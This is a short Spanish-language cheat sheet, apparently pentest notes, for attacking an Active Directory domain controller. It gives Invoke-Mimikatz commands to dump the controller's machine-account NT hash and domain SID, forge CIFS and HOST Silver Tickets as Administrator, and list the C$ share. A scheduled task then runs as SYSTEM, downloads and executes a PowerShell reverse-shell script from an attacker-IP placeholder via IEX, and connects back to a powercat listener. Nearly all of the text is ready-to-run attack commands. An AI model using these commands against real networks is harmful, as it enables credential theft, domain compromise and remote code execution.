1) Obtenci贸n de hash NT de la cuenta del host del controlador de dominio (RID: 000003e8 / 1000) y SID del dominio con Invoke-Mimikatz.
$session = New-PSSession -ComputerName <computer-name-DC>
Invoke-Command -FilePath C:\<path>\Invoke-Mimikatz.ps1 -Session $session
Enter-PSSession -Session $session
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
2) Creaci贸n de Silver Ticket de servicio CIFS con Invoke-Mimikatz.
# Creaci贸n de Silver Ticket
Invoke-Mimikatz -Command '"kerberos::golden /domain:<ACME.LOCAL> /sid:<SID-domain> /target:<DC01.ACME.LOCAL> /service:CIFS /rc4:<NT-hash-computer-DC> /user:Administrator /ptt"'
# Lectura de archivos
dir \\<DC01.ACME.LOCAL>\C$
3) Creaci贸n de Silver Ticket de servicio HOST con Invoke-Mimikatz.
# Creaci贸n de Silver Ticket
Invoke-Mimikatz -Command '"kerberos::golden /domain:<ACME.LOCAL> /sid:<SID-domain> /target:<DC01.ACME.LOCAL> /service:HOST /rc4:<NT-hash-computer-DC> /user:Administrator /ptt"'
# Reverse shell desde tarea programada
schtasks /create /S <DC01.ACME.LOCAL> /SC Weekly /RU "NT Authority\SYSTEM" /TN "TaskReverseShell" /TR "powershell.exe -c 'IEX (New-Object Net.WebClient).DownloadString(''http://<attacker-IP-address>:80/Invoke-PowerShellTcpAutoExec.ps1''')'"
powercat -l -v -p <listen-port>
schtasks /Run /S <DC01.ACME.LOCAL> /TN "TaskReverseShell"